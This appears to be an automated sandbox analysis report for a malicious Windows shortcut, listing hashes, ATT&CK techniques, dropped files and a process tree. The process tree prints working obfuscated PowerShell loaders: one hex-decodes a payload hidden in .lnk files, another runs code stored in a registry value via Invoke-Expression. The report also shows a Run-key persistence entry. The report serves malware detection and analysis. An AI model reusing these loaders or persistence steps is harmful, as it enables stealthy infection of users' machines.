f5348c868d3081337ed697e0d2016b39d328fd982af4e1923d1aea45762629e1

Analysis

max time kernel
1191s
max time network
1193s
platform
windows10_x64
resource
win10v20210408
submitted
27-07-2021 17:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

REMITTAN.LNK
Size

4.3MB
MD5

cc2a7754840911050d768c6be92005a6
SHA1

6eb79a31cc322a1a6c4b18bb1c9844108b57313c
SHA256

ac8ec0eddd80b41d238c54f1262caefd6e80312826157564e933ff35be63c6cd
SHA512

02f3ee8eaad9adaa3baafd39f94f4115fec3d0f97b67a4f8fbf6b342db95681a07eefd2192201d5b8e1d888818b3615d7ff10d77b1f509056091b007f6e541db

Score

8^/10

persistence

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

client.exe

pid process

580 client.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1484 rundll32.exe

pid	process
580	client.exe

pid	process
1484	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\UserPreferencesDefault = "rundll32.exe C:\\Users\\Admin\\AppData\\Roaming\\userpref.dll,main"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

2740 powershell.exe
2740 powershell.exe
2740 powershell.exe
740 powershell.exe
740 powershell.exe
740 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2740 powershell.exe
Token: SeDebugPrivilege 740 powershell.exe

pid	process
2740	powershell.exe
2740	powershell.exe
2740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	740	powershell.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

cmd.exepowershell.execsc.execsc.exerundll32.exe

description	pid	process	target process
PID 808 wrote to memory of 2740	808	cmd.exe	powershell.exe
PID 808 wrote to memory of 2740	808	cmd.exe	powershell.exe
PID 2740 wrote to memory of 1172	2740	powershell.exe	csc.exe
PID 2740 wrote to memory of 1172	2740	powershell.exe	csc.exe
PID 1172 wrote to memory of 3648	1172	csc.exe	cvtres.exe
PID 1172 wrote to memory of 3648	1172	csc.exe	cvtres.exe
PID 2740 wrote to memory of 60	2740	powershell.exe	csc.exe
PID 2740 wrote to memory of 60	2740	powershell.exe	csc.exe
PID 60 wrote to memory of 3912	60	csc.exe	cvtres.exe
PID 60 wrote to memory of 3912	60	csc.exe	cvtres.exe
PID 2740 wrote to memory of 580	2740	powershell.exe	client.exe
PID 2740 wrote to memory of 580	2740	powershell.exe	client.exe
PID 2740 wrote to memory of 580	2740	powershell.exe	client.exe
PID 2740 wrote to memory of 1484	2740	powershell.exe	rundll32.exe
PID 2740 wrote to memory of 1484	2740	powershell.exe	rundll32.exe
PID 1484 wrote to memory of 740	1484	rundll32.exe	powershell.exe
PID 1484 wrote to memory of 740	1484	rundll32.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\REMITTAN.LNK
1⤵
- Suspicious use of WriteProcessMemory
PID:808

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dS($A) {$kD = $Null;Get-ChildItem $A -Recurse -Depth 1 -ErrorAction 'SilentlyContinue' | ? {$_.extension -eq '.lnk'} | % {$Hu = [String](Get-Content $_.FullName);$Bz = 'QCASPHONCWMSJSYHBDCYJKMQSIABRBQF';$b = $Hu.IndexOf($Bz);if($b -ne -1) {$Ko = $Hu.SubString($b);$kD = $Ko.Replace($Bz,'')}};return $kD};function sH($Gt) {$Bg = [Text.StringBuilder]::New();for($aI=0;$aI -lt $Gt.Length;$aI+=2){[void]$Bg.Append([char][int]('0x'+$Gt.Substring($aI,2)))}return $Bg.ToString()}$kD = dS $(Get-Location).Path;if($kD -eq $Null) {$kD = dS $($env:TEMP)};$e = [ScriptBlock]::Create((sH $kD));$e.Invoke();
2⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gr2o3cdy\gr2o3cdy.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1172

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6F4.tmp" "c:\Users\Admin\AppData\Local\Temp\gr2o3cdy\CSCE52AAF24CDF0407F84805CCF7C137CA2.TMP"
4⤵
PID:3648

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vwn2mfr1\vwn2mfr1.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:60

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA9C3.tmp" "c:\Users\Admin\AppData\Local\Temp\vwn2mfr1\CSC7E72E55CB5494975B4299FDB3CB18B.TMP"
4⤵
PID:3912

C:\Users\Admin\AppData\Roaming\client.exe
"C:\Users\Admin\AppData\Roaming\client.exe"
3⤵
- Executes dropped EXE
PID:580

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\userpref.dll,main
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $oUa = [string][char[]]@(0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x64,0x28,0x24,0x6C,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x49,0x23,0x3D,0x23,0x5B,0x54,0x65,0x78,0x74,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x42,0x75,0x69,0x6C,0x64,0x65,0x72,0x5D,0x3A,0x3A,0x4E,0x65,0x77,0x28,0x29,0x0D,0x0A,0x66,0x6F,0x72,0x28,0x24,0x51,0x3D,0x30,0x3B,0x24,0x51,0x23,0x2D,0x6C,0x74,0x23,0x24,0x6C,0x2E,0x4C,0x65,0x6E,0x67,0x74,0x68,0x3B,0x24,0x51,0x2B,0x3D,0x32,0x29,0x7B,0x0D,0x0A,0x5B,0x76,0x6F,0x69,0x64,0x5D,0x24,0x49,0x2E,0x41,0x70,0x70,0x65,0x6E,0x64,0x28,0x5B,0x43,0x68,0x61,0x72,0x5D,0x5B,0x49,0x6E,0x74,0x5D,0x28,0x27,0x30,0x78,0x27,0x2B,0x24,0x6C,0x2E,0x53,0x75,0x62,0x73,0x74,0x72,0x69,0x6E,0x67,0x28,0x24,0x51,0x2C,0x32,0x29,0x29,0x29,0x7D,0x0D,0x0A,0x72,0x65,0x74,0x75,0x72,0x6E,0x23,0x24,0x49,0x2E,0x54,0x6F,0x53,0x74,0x72,0x69,0x6E,0x67,0x28,0x29,0x7D,0x0D,0x0A,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x76,0x28,0x24,0x4F,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x6C,0x23,0x3D,0x23,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x42,0x69,0x74,0x43,0x6F,0x6E,0x76,0x65,0x72,0x74,0x65,0x72,0x5D,0x3A,0x3A,0x54,0x6F,0x53,0x74,0x72,0x69,0x6E,0x67,0x28,0x24,0x4F,0x29,0x0D,0x0A,0x24,0x6C,0x23,0x3D,0x23,0x24,0x6C,0x2E,0x72,0x65,0x70,0x6C,0x61,0x63,0x65,0x28,0x27,0x2D,0x27,0x2C,0x27,0x27,0x29,0x0D,0x0A,0x72,0x65,0x74,0x75,0x72,0x6E,0x23,0x24,0x6C,0x7D,0x0D,0x0A,0x66,0x75,0x6E,0x63,0x74,0x69,0x6F,0x6E,0x23,0x4D,0x28,0x29,0x23,0x7B,0x0D,0x0A,0x24,0x5A,0x23,0x3D,0x23,0x27,0x48,0x4B,0x43,0x55,0x3A,0x5C,0x43,0x6F,0x6E,0x74,0x72,0x6F,0x6C,0x23,0x50,0x61,0x6E,0x65,0x6C,0x5C,0x44,0x65,0x73,0x6B,0x74,0x6F,0x70,0x27,0x0D,0x0A,0x24,0x74,0x23,0x3D,0x23,0x47,0x65,0x74,0x2D,0x49,0x74,0x65,0x6D,0x50,0x72,0x6F,0x70,0x65,0x72,0x74,0x79,0x23,0x2D,0x50,0x61,0x74,0x68,0x23,0x24,0x5A,0x23,0x2D,0x4E,0x61,0x6D,0x65,0x23,0x27,0x55,0x73,0x65,0x72,0x50,0x72,0x65,0x66,0x65,0x72,0x65,0x6E,0x63,0x65,0x73,0x44,0x65,0x66,0x61,0x75,0x6C,0x74,0x27,0x23,0x2D,0x45,0x72,0x72,0x6F,0x72,0x41,0x63,0x74,0x69,0x6F,0x6E,0x23,0x53,0x69,0x6C,0x65,0x6E,0x74,0x6C,0x79,0x43,0x6F,0x6E,0x74,0x69,0x6E,0x75,0x65,0x23,0x7C,0x23,0x53,0x65,0x6C,0x65,0x63,0x74,0x2D,0x4F,0x62,0x6A,0x65,0x63,0x74,0x23,0x2D,0x45,0x78,0x70,0x61,0x6E,0x64,0x23,0x27,0x55,0x73,0x65,0x72,0x50,0x72,0x65,0x66,0x65,0x72,0x65,0x6E,0x63,0x65,0x73,0x44,0x65,0x66,0x61,0x75,0x6C,0x74,0x27,0x0D,0x0A,0x24,0x57,0x23,0x3D,0x23,0x76,0x23,0x24,0x74,0x0D,0x0A,0x24,0x70,0x23,0x3D,0x23,0x64,0x23,0x24,0x57,0x0D,0x0A,0x49,0x6E,0x76,0x6F,0x6B,0x65,0x2D,0x45,0x78,0x70,0x72,0x65,0x73,0x73,0x69,0x6F,0x6E,0x23,0x24,0x70,0x7D,0x0D,0x0A,0x4D) -replace ' ','';$FTX = [string][char[]]@(0x69,0x4E,0x56,0x4F,0x4B,0x65,0x2D,0x65,0x58,0x70,0x72,0x45,0x73,0x73,0x69,0x4F,0x4E) -replace ' ','';sal tWz $FTX;$oUa = $oUa.replace('#', ' ');tWz $oUa
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:740

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
cd7fb3d11c938541ac33d6fd4089e437

SHA1
dcb4c9240c96520dfa600dd31c1f9b1f59564a18

SHA256
275f6b0e155160d6c34d9a60887766ceec17fdf2e5ec0088cb293fd92b773cd6

SHA512
735a5a41fb938921d87ca078e8fe1194576ab6ab4754eda675a957582ca8acc02639b7caabc60578b8a147f60bc99a0c1e1d943418a4b98dc23a241cb9ed72ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
11e90a14af29438d79bb05a1bc0c4435

SHA1
3c6160e71249177d3c904b5be516b1593cbdc1a9

SHA256
ce1bdb1a1cc5c5597ea7c295d7044a5f5076163cffb109291703201bad2265e0

SHA512
a94ac18320cdef0dab7dae2e67691d89ef08760b630c054d89a3bf00ee0060d45eba15e889da9e26d942d4803e795a01e2e5b214c0ef6fa5d6f7af10e20994ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA6F4.tmp
MD5
80109eccd7f5926ffbb793ee9a23fde3

SHA1
c6bdfeb1e35498ba9ccc73f60b0fe2d7652f720a

SHA256
e6e87e8144550fcbf4e81adf94003683b674f0bd8c51728f7e77840e6aa0f6d3

SHA512
087e3b909a8b7508921f61cd57023c0e384c2891d0c5b5ee097df702ef539674902b427917c68109449dc0d6a022af5828157379d43dd9d13445a86bcfcff23e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA9C3.tmp
MD5
c9be156faca90ca5330c175facd6fbee

SHA1
c97f1624a1307fd7c6ad71f3a85a6671db268fcc

SHA256
07ab1e7340b8b954719ce9c25f11527f26f77920effe16d17eddcaf4790bed62

SHA512
c1c34190bac066b53d0f4f6740b5e81351c82e748a898b94f0ad08d6312b86acbcd19fc06bd55320de45d06947e595ce68354da6a81b77dcbce774e712d42172

Download Submit
C:\Users\Admin\AppData\Local\Temp\gr2o3cdy\gr2o3cdy.dll
MD5
9cf0943883366f1e015177edaaa355a3

SHA1
6d4d1015992ac6bc916afc384302ab2f29671ad0

SHA256
decb531e262a7111986259bcd748eef1cc892183d953ef68e17f8aadf6e1c297

SHA512
4253fd687201b5d5ec03f0530d885c4dcb50bb7db4bf7296166c8aa9ea92d05df1aa27c0075a1e0862d4a849cddc07e46f6f988d38dfaaa54f1e1fe418b1dbb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\vwn2mfr1\vwn2mfr1.dll
MD5
666d21bb7a7b9253c450732548830370

SHA1
2d71ed5f55f873a9bb9f48f3bc1ba6c30cfc8566

SHA256
40e48a58693dc878fe85f32ce3e70b067d3cb1fc17737eae33dbd23aba8df051

SHA512
730533d7d230d0999eb269a15d629f8442754c2645313db100ae10dae6c6153847a43b6dc703a91e14de2e5493a06bffce033fc1a4e56c4b71a1ec7e387c2865

Download Submit
C:\Users\Admin\AppData\Roaming\client.exe
MD5
7574d81f10afb1cfdc4ac7acca1bff83

SHA1
478389bfdd75704fe7cd5d911514b9649857b798

SHA256
263e81885e5402a53346435c091dd904bc77917cfd348d0c7219fe110d10345a

SHA512
c34463a21bb28b410f6586c86cfbf2f530da03c7ca705cdb4e383b4cedcd045d8b8fa13e24e49c03876a9b0a6a9ee7a049e5406a6495418df34f34b2ed524585

Download Submit
C:\Users\Admin\AppData\Roaming\client.exe
MD5
7574d81f10afb1cfdc4ac7acca1bff83

SHA1
478389bfdd75704fe7cd5d911514b9649857b798

SHA256
263e81885e5402a53346435c091dd904bc77917cfd348d0c7219fe110d10345a

SHA512
c34463a21bb28b410f6586c86cfbf2f530da03c7ca705cdb4e383b4cedcd045d8b8fa13e24e49c03876a9b0a6a9ee7a049e5406a6495418df34f34b2ed524585

Download Submit
C:\Users\Admin\AppData\Roaming\userpref.dll
MD5
5b2e8b0887e41ff72ac66799beeccb90

SHA1
82bbe01b7a2cb252892a5bed5d5af58fb641cd38

SHA256
739d52cf78560ab2c1dcd0f272006549d15312f0dcccc420bf669717422da441

SHA512
3ec6ef1bcdc2472e1edb1ecf578496a1194ef0e8de50bc47b270d6b23955ea7250c268b7bbe109b8b5df3c2610c952b59bd7ced6823dc22215183d53e7ad7e53

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gr2o3cdy\CSCE52AAF24CDF0407F84805CCF7C137CA2.TMP
MD5
78a449d2c0e2ccb43faf18fed32dca30

SHA1
0c02e1fd4ef2da744dcc2ea52caa12ab970902c8

SHA256
1c04f39a87d5429a7d4e35b8480b3502ba533b4ae79222c7d61d8ffcd64df695

SHA512
54ee7c9cc540343b71650e0e3df2f2f667338977b2741ae8a5d1ee0ac47f390cde046b36aa85bb16be177842b3e7d428b6673849a70d62960c9019c546366641

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gr2o3cdy\gr2o3cdy.0.cs
MD5
c0136606a60235ac4eedf5ebfbf72242

SHA1
3adc968e7d42959b5b6892ad9836b9e5a7a80247

SHA256
36a3409023121f56e60418e19521f1241ee5ab41b8c299d04c53fe63a83a054f

SHA512
1c09303dc198f6cd9d2f2f73290089f3d4056379e4f76ec081871b06b920b5e548b017a047eeadcb535761f5c436f6a4abec7a848337c1fe65209d9cf43abaed

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gr2o3cdy\gr2o3cdy.cmdline
MD5
17b4e57d6258569b80d58f485a6883c1

SHA1
532fbcc07ead4c5e52445bd897831cf5c32a8180

SHA256
943413d988e6a9625ba9b430c05392b7e8f173d41da993a6caa091e116501cc9

SHA512
1aa38af857867c9f8454822788aacc01380d500195440c0475403f24cdbbe5247e3b37395879cb0f1f47c1f6b6d3c5bc439ac72f5ccb21551ae4666cbeef0710

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vwn2mfr1\CSC7E72E55CB5494975B4299FDB3CB18B.TMP
MD5
d07751958882403469822ca11b3224dc

SHA1
bf949bcdbf14a64deac3b950b38689d84f036ac1

SHA256
5746a4009ae4fd2da725c809613f99e4f4ea16dfa92429e9d70acb3acf0aa0c1

SHA512
4785ce7d35a2d6e9841704bc747a1488e74ca4a7d24ed62d2a28a4aa0bd65ee00bc36ef1e4d7f7924fdfe3d69c9ecdb726fc1c862e9b770fb65a50b4b63a3452

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vwn2mfr1\vwn2mfr1.0.cs
MD5
7e8be7de46cb8a991a864885286e1db9

SHA1
600af06d154bc655d186b295205542a049957ae8

SHA256
2d66ad50bdbe759adf78a4f7de6f39c4d98b49ad83083eae1ea95130affa9ac4

SHA512
b0b01f8cad3150c16dbcc198ad15ed2c117bbfcfd5969438646b7c10de95939f238775e0faf7404e633232cfee55281a25b8d3762c0542cb3d2df9def4ba9653

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\vwn2mfr1\vwn2mfr1.cmdline
MD5
f02c668c8c79e89880c7fdfc0133ff96

SHA1
02e191ddf50ef2593110b1604d8bdb84b6b7e311

SHA256
2ea32315c363303b3619f2241b9dd31e619129b8bb50ad583eb386f13ce3c5e7

SHA512
9b915869cafa6ca53066de0d7af2ede052a5950bb566859243bf49486251bd9d268350c49311890d728149e0ae79faf4c8c6d403dee31bb06c65a3f360c092a7

Download Submit
\Users\Admin\AppData\Roaming\userpref.dll
MD5
5b2e8b0887e41ff72ac66799beeccb90

SHA1
82bbe01b7a2cb252892a5bed5d5af58fb641cd38

SHA256
739d52cf78560ab2c1dcd0f272006549d15312f0dcccc420bf669717422da441

SHA512
3ec6ef1bcdc2472e1edb1ecf578496a1194ef0e8de50bc47b270d6b23955ea7250c268b7bbe109b8b5df3c2610c952b59bd7ced6823dc22215183d53e7ad7e53

Download Submit
memory/60-153-0x0000000000000000-mapping.dmp

Download
memory/580-179-0x00000000007E0000-0x00000000007E1000-memory.dmp

Filesize
4KB

Download
memory/580-166-0x0000000000000000-mapping.dmp

Download
memory/580-215-0x0000000000800000-0x000000000081A000-memory.dmp

Filesize
104KB

Download
memory/740-213-0x00000196F6F96000-0x00000196F6F98000-memory.dmp

Filesize
8KB

Download
memory/740-192-0x00000196F6F93000-0x00000196F6F95000-memory.dmp

Filesize
8KB

Download
memory/740-190-0x00000196F6F90000-0x00000196F6F92000-memory.dmp

Filesize
8KB

Download
memory/740-176-0x0000000000000000-mapping.dmp

Download
memory/1172-137-0x0000000000000000-mapping.dmp

Download
memory/1484-172-0x0000000000000000-mapping.dmp

Download
memory/2740-123-0x0000021772CB0000-0x0000021772CB1000-memory.dmp

Filesize
4KB

Download
memory/2740-124-0x00000217720B0000-0x00000217720B2000-memory.dmp

Filesize
8KB

Download
memory/2740-125-0x00000217720B3000-0x00000217720B5000-memory.dmp

Filesize
8KB

Download
memory/2740-132-0x00000217720B6000-0x00000217720B8000-memory.dmp

Filesize
8KB

Download
memory/2740-161-0x00000217720B8000-0x00000217720B9000-memory.dmp

Filesize
4KB

Download
memory/2740-144-0x0000021772C70000-0x0000021772C71000-memory.dmp

Filesize
4KB

Download
memory/2740-119-0x00000217721C0000-0x00000217721C1000-memory.dmp

Filesize
4KB

Download
memory/2740-160-0x0000021772C80000-0x0000021772C81000-memory.dmp

Filesize
4KB

Download
memory/2740-114-0x0000000000000000-mapping.dmp

Download
memory/3648-140-0x0000000000000000-mapping.dmp

Download
memory/3912-156-0x0000000000000000-mapping.dmp

Download